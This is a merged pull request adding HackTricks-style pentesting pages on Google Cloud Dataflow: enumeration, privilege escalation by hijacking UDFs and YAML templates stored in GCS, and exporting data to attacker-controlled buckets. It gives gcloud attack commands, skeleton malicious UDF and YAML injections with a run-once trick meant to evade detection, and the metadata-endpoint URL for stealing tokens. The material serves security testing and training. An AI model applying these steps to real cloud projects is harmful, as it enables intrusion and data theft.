Merge pull request #259 from Tamirye/dataflowrider

carlospolop · web-flow · commit 1685887efa5c · 2026-02-16T12:06:38.000+01:00
grte-ye-ti
diff --git a/src/SUMMARY.md b/src/SUMMARY.md
@@ -95,6 +95,7 @@
     - [GCP - Cloud Shell Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md)
     - [GCP - Cloud SQL Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md)
     - [GCP - Compute Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-compute-post-exploitation.md)
+    - [GCP - Dataflow Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md)
     - [GCP - Filestore Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-filestore-post-exploitation.md)
     - [GCP - IAM Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-iam-post-exploitation.md)
     - [GCP - KMS Post Exploitation](pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-kms-post-exploitation.md)
@@ -123,6 +124,7 @@
     - [GCP - Composer Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-composer-privesc.md)
     - [GCP - Container Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-container-privesc.md)
     - [GCP - Dataproc Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataproc-privesc.md)
+    - [GCP - Dataflow Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md)
     - [GCP - Deploymentmaneger Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-deploymentmaneger-privesc.md)
     - [GCP - IAM Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-iam-privesc.md)
     - [GCP - KMS Privesc](pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-kms-privesc.md)
@@ -176,6 +178,7 @@
       - [GCP - VPC & Networking](pentesting-cloud/gcp-security/gcp-services/gcp-compute-instances-enum/gcp-vpc-and-networking.md)
     - [GCP - Composer Enum](pentesting-cloud/gcp-security/gcp-services/gcp-composer-enum.md)
     - [GCP - Containers & GKE Enum](pentesting-cloud/gcp-security/gcp-services/gcp-containers-gke-and-composer-enum.md)
+    - [GCP - Dataflow Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md)
     - [GCP - Dataproc Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dataproc-enum.md)
     - [GCP - DNS Enum](pentesting-cloud/gcp-security/gcp-services/gcp-dns-enum.md)
     - [GCP - Filestore Enum](pentesting-cloud/gcp-security/gcp-services/gcp-filestore-enum.md)
diff --git a/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md b/src/pentesting-cloud/gcp-security/gcp-post-exploitation/gcp-dataflow-post-exploitation.md
@@ -0,0 +1,55 @@
+# GCP - Dataflow Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+For more information about Dataflow check:
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
+### Using Dataflow to exfiltrate data from other services
+
+**Permissions:** `dataflow.jobs.create`, `resourcemanager.projects.get`, `iam.serviceAccounts.actAs` (over a SA with access to source and sink)
+
+With Dataflow job creation rights, you can use GCP Dataflow templates to export data from Bigtable, BigQuery, Pub/Sub, and other services into attacker-controlled GCS buckets. This is a powerful post-exploitation technique when you have obtained Dataflow access—for example via the [Dataflow Rider](../gcp-privilege-escalation/gcp-dataflow-privesc.md) privilege escalation (pipeline takeover via bucket write).
+
+> [!NOTE]
+> You need `iam.serviceAccounts.actAs` over a service account with sufficient permissions to read the source and write to the sink. By default, the Compute Engine default SA is used if not specified.
+
+#### Bigtable to GCS
+
+See [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md#dump-rows-to-your-bucket) — "Dump rows to your bucket" for the full pattern. Templates: `Cloud_Bigtable_to_GCS_Json`, `Cloud_Bigtable_to_GCS_Parquet`, `Cloud_Bigtable_to_GCS_SequenceFile`.
+
+<details>
+
+<summary>Export Bigtable to attacker-controlled bucket</summary>
+
+```bash
+gcloud dataflow jobs run <job-name> \
+  --gcs-location=gs://dataflow-templates-us-<REGION>/<VERSION>/Cloud_Bigtable_to_GCS_Json \
+  --project=<PROJECT> \
+  --region=<REGION> \
+  --parameters=bigtableProjectId=<PROJECT>,bigtableInstanceId=<INSTANCE_ID>,bigtableTableId=<TABLE_ID>,filenamePrefix=<PREFIX>,outputDirectory=gs://<YOUR_BUCKET>/raw-json/ \
+  --staging-location=gs://<YOUR_BUCKET>/staging/
+```
+
+</details>
+
+#### BigQuery to GCS
+
+Dataflow templates exist to export BigQuery data. Use the appropriate template for your target format (JSON, Avro, etc.) and point the output to your bucket.
+
+#### Pub/Sub and streaming sources
+
+Streaming pipelines can read from Pub/Sub (or other sources) and write to GCS. Launch a job with a template that reads from the target Pub/Sub subscription and writes to your controlled bucket.
+
+## References
+
+- [Dataflow templates](https://cloud.google.com/dataflow/docs/guides/templates/provided-templates)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [GCP - Bigtable Post Exploitation](gcp-bigtable-post-exploitation.md)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md b/src/pentesting-cloud/gcp-security/gcp-privilege-escalation/gcp-dataflow-privesc.md
@@ -0,0 +1,184 @@
+# GCP - Dataflow Privilege Escalation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Dataflow
+
+{{#ref}}
+../gcp-services/gcp-dataflow-enum.md
+{{#endref}}
+
+### `storage.objects.create`, `storage.objects.get`, `storage.objects.update`
+
+Dataflow does not validate integrity of UDFs and job template YAMLs stored in GCS. 
+With bucket write access, you can overwrite these files to inject code, execute code on the workers, steal service account tokens, or alter data processing.
+Both batch and streaming pipeline jobs are viable targets for this attack. In order to execute this attack on a pipeline we need to replace UDFs/templates before the job runs, during the first few minutes (before the job workers are created) or during the job run before new workers spin up (due to autoscaling).
+
+**Attack vectors:**
+- **UDF hijacking:** Python (`.py`) and JS (`.js`) UDFs referenced by pipelines and stored in customer-managed buckets
+- **Job template hijacking:** Custom YAML pipeline definitions stored in customer-managed buckets
+
+
+> [!WARNING]
+> **Run-once-per-worker trick:** Dataflow UDFs and template callables are invoked **per row/line**. Without coordination, exfiltration or token theft would run thousands of times, causing noise, rate limiting, and detection. Use a **file-based coordination** pattern: check if a marker file (e.g. `/tmp/pwnd.txt`) exists at the start; if it exists, skip malicious code; if not, run the payload and create the file. This ensures the payload runs **once per worker**, not per line.
+
+
+#### Direct exploitation via gcloud CLI
+
+1. Enumerate Dataflow jobs and locate the template/UDF GCS paths:
+
+<details>
+
+<summary>List jobs and describe to get template path, staging location, and UDF references</summary>
+
+```bash
+# List jobs (optionally filter by region)
+gcloud dataflow jobs list --region=<region>
+gcloud dataflow jobs list --project=<PROJECT_ID>
+
+# Describe a job to get template GCS path, staging location, and any UDF/template references
+gcloud dataflow jobs describe <JOB_ID> --region=<region> --full --format="yaml"
+# Look for: currentState, createTime, jobMetadata, type (JOB_TYPE_STREAMING or JOB_TYPE_BATCH)
+# Pipeline options often include: tempLocation, stagingLocation, templateLocation, or flexTemplateGcsPath
+```
+
+</details>
+
+2. Download the original UDF or job template from GCS:
+
+<details>
+
+<summary>Download UDF file or YAML template from bucket</summary>
+
+```bash
+# If job references a UDF at gs://bucket/path/to/udf.py
+gcloud storage cp gs://<BUCKET>/<PATH>/<udf_file>.py ./udf_original.py
+
+# Or for a YAML job template
+gcloud storage cp gs://<BUCKET>/<PATH>/<template>.yaml ./template_original.yaml
+```
+
+</details>
+
+3. Edit the file locally: inject the malicious payload (see Python UDF or YAML snippets below) and ensure the run-once coordination pattern is used.
+
+4. Re-upload to overwrite the original file:
+
+<details>
+
+<summary>Overwrite UDF or template in bucket</summary>
+
+```bash
+gcloud storage cp ./udf_injected.py gs://<BUCKET>/<PATH>/<udf_file>.py
+
+# Or for YAML
+gcloud storage cp ./template_injected.yaml gs://<BUCKET>/<PATH>/<template>.yaml
+```
+
+</details>
+
+5. Wait for the next job run, or (for streaming) trigger autoscaling (e.g. flood the pipeline input) so new workers spin up and pull the modified file.
+
+#### Python UDF injection
+
+If you want to have a the worker exfiltrate data to your C2 server use `urllib.request` and not `requests`.
+`requests` is not preinstalled on classic Dataflow workers.
+
+<details>
+
+<summary>Malicious UDF with run-once coordination and metadata extraction</summary>
+
+```python
+import os
+import json
+import urllib.request
+from datetime import datetime
+
+def _malicious_func():
+    # File-based coordination: run once per worker.
+    coordination_file = "/tmp/pwnd.txt"
+    if os.path.exists(coordination_file):
+        return
+
+    # malicous code goes here
+    with open(coordination_file, "w", encoding="utf-8") as f:
+        f.write("done")
+
+def transform(line):
+    # Malicous code entry point - runs per line but coordination ensures once per worker
+    try:
+        _malicious_func()
+    except Exception:
+        pass
+    # ... original UDF logic follows ...
+```
+
+</details>
+
+
+#### Job template YAML injection
+
+Inject a `MapToFields` step with a callable that uses a coordination file. For YAML-based pipelines that support `requests`, use it if the template declares `dependencies: [requests]`; otherwise prefer `urllib.request`.
+
+Add the cleanup step (`drop: [malicious_step]`) so the pipeline still writes valid data to the destination. 
+
+<details>
+
+<summary>Malicious MapToFields step and cleanup in pipeline YAML</summary>
+
+
+```yaml
+- name: MaliciousTransform
+  type: MapToFields
+  input: Transform
+  config:
+    language: python
+    fields:
+      malicious_step:
+        callable: |
+          def extract_and_return(row):
+              import os
+              import json
+              from datetime import datetime
+              coordination_file = "/tmp/pwnd.txt"
+              if os.path.exists(coordination_file):
+                  return True
+              try:
+                  import urllib.request
+                  # malicious code goes here
+                  with open(coordination_file, "w", encoding="utf-8") as f:
+                      f.write("done")
+              except Exception:
+                  pass
+              return True
+    append: true
+- name: CleanupTransform
+  type: MapToFields
+  input: MaliciousTransform
+  config:
+    fields: {}
+    append: true
+    drop:
+      - malicious_step
+```
+
+</details>
+
+### Compute Engine access to Dataflow Workers
+
+**Permissions:** `compute.instances.osLogin` or `compute.instances.osAdminLogin` (with `iam.serviceAccounts.actAs` over the worker SA), or `compute.instances.setMetadata` / `compute.projects.setCommonInstanceMetadata` (with `iam.serviceAccounts.actAs`) for legacy SSH key injection
+
+Dataflow workers run as Compute Engine VMs. Access to workers via OS Login or SSH lets you read SA tokens from the metadata endpoint (`http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token`), manipulate data, or run arbitrary code.
+
+For exploitation details, see:
+- [GCP - Compute Privesc](gcp-compute-privesc/README.md) — `compute.instances.osLogin`, `compute.instances.osAdminLogin`, `compute.instances.setMetadata`
+
+## References
+
+- [Dataflow Rider: How Attackers can Abuse Shadow Resources in Google Cloud Dataflow](https://www.varonis.com/blog/dataflow-rider)
+- [Control access with IAM (Dataflow)](https://cloud.google.com/dataflow/docs/concepts/security-and-permissions)
+- [gcloud dataflow jobs describe](https://cloud.google.com/sdk/gcloud/reference/dataflow/jobs/describe)
+- [Apache Beam YAML: User-defined functions](https://beam.apache.org/documentation/sdks/yaml-udf/)
+- [Apache Beam YAML Transform Reference](https://beam.apache.org/releases/yamldoc/current/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md b/src/pentesting-cloud/gcp-security/gcp-services/gcp-dataflow-enum.md
@@ -0,0 +1,85 @@
+# GCP - Dataflow Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Basic Information
+
+**Google Cloud Dataflow** is a fully managed service for **batch and streaming data processing**. It enables organizations to build pipelines that transform and analyze data at scale, integrating with Cloud Storage, BigQuery, Pub/Sub, and Bigtable. Dataflow pipelines run on worker VMs in your project; templates and User-Defined Functions (UDFs) are often stored in GCS buckets. [Learn more](https://cloud.google.com/dataflow).
+
+## Components
+
+A Dataflow pipeline typically includes:
+
+**Template:** YAML or JSON definitions (and Python/Java code for flex templates) stored in GCS that define the pipeline structure and steps.
+
+**Launcher (Flex Templates):** A short-lived Compute Engine instance may be used for Flex Template launches to validate the template and prepare containers before the job runs.
+
+**Workers:** Compute Engine VMs that execute the actual data processing tasks, pulling UDFs and instructions from the template.
+
+**Staging/Temp buckets:** GCS buckets that store temporary pipeline data, job artifacts, UDF files, flex template metadata (`.json`).
+
+## Batch vs Streaming Jobs
+
+Dataflow supports two execution modes:
+
+**Batch jobs:** Process a fixed, bounded dataset (e.g. a log file, a table export). The job runs once to completion and then terminates. Workers are created for the duration of the job and shut down when done. Batch jobs are typically used for ETL, historical analysis, or scheduled data migrations.
+
+**Streaming jobs:** Process unbounded, continuously arriving data (e.g. Pub/Sub messages, live sensor feeds). The job runs until explicitly stopped. Workers may scale up and down; new workers can be spawned due to autoscaling, and they will pull pipeline components (templates, UDFs) from GCS at startup.
+
+## Enumeration
+
+Dataflow jobs and related resources can be enumerated to gather service accounts, template paths, staging buckets, and UDF locations.
+
+### Job Enumeration
+
+To enumerate Dataflow jobs and retrieve their details:
+
+```bash
+# List Dataflow jobs in the project 
+gcloud dataflow jobs list
+# List Dataflow jobs (by region)
+gcloud dataflow jobs list --region=<region>
+
+# Describe job (includes service account, template GCS path, staging location, parameters)
+gcloud dataflow jobs describe <job-id> --region=<region>
+```
+
+Job descriptions reveal the template GCS path, staging location, and worker service account—useful for identifying buckets that store pipeline components.
+
+### Template and Bucket Enumeration
+
+Buckets referenced in job descriptions may contain flex templates, UDFs, or YAML pipeline definitions:
+
+```bash
+# List objects in a bucket (look for .json flex templates, .py UDFs, .yaml pipeline defs)
+gcloud storage ls gs://<bucket>/
+
+# List objects recursively
+gcloud storage ls gs://<bucket>/** 
+```
+
+## Privilege Escalation
+
+{{#ref}}
+../gcp-privilege-escalation/gcp-dataflow-privesc.md
+{{#endref}}
+
+## Post Exploitation
+
+{{#ref}}
+../gcp-post-exploitation/gcp-dataflow-post-exploitation.md
+{{#endref}}
+
+## Persistence
+
+{{#ref}}
+../gcp-persistence/gcp-dataflow-persistence.md
+{{#endref}}
+
+## References
+
+- [Dataflow overview](https://cloud.google.com/dataflow)
+- [Pipeline workflow execution in Dataflow](https://cloud.google.com/dataflow/docs/guides/pipeline-workflows)
+- [Troubleshoot templates](https://cloud.google.com/dataflow/docs/guides/troubleshoot-templates)
+
+{{#include ../../../banners/hacktricks-training.md}}